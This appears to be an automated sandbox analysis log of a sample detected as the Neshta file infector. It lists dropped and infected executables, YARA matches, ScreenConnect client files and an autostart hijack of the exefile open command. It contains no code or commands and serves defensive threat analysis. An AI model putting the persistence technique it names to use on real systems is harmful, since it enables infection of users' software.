Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Windows\svchost.com
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI13D3.tmp
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSIFE41.tmp-\ScreenConnect.InstallerActions.dll
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSIFE41.tmp-\Microsoft.Deployment.WindowsInstaller.dll
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI1045.tmp
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIFE7.tmp
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Users\user\AppData\Local\Temp\CR_94EB1.tmp\setup.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI11DE.tmp
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSIFE41.tmp-\ScreenConnect.Core.dll
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSIFE41.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Core.dll
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\AutoIt3\Uninstall.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIDF2.tmp
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Windows.dllJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1045.tmpJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI11DE.tmpJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDF2.tmpJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI13D3.tmpJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFE7.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile created: C:\Windows\svchost.comJump to dropped file

                          Boot Survival:

                          Yara detected Neshta
                          Source: Yara match | File source: $RUX313H.exe, type: SAMPLE
                          Source: Yara match | File source: 2.2.svchost.com.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.$RUX313H.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.$RUX313H.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.0.svchost.com.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: $RUX313H.exe PID: 6336, type: MEMORYSTR
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, type: DROPPED
                          Source: Yara match | File source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, type: DROPPED
                          Source: Yara match | File source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
                          Source: Yara match | File source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, type: DROPPED
                          Source: Yara match | File source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, type: DROPPED
                          Source: Yara match | File source: C:\Windows\svchost.com, type: DROPPED
                          Source: Yara match | File source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPED
                          Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, type: DROPPED
                          Source: Yara match | File source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, type: DROPPED
                          Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe, type: DROPPED
                          Creates an undocumented autostart registry key
                          Source: C:\Users\user\Desktop\$RUX313H.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULL
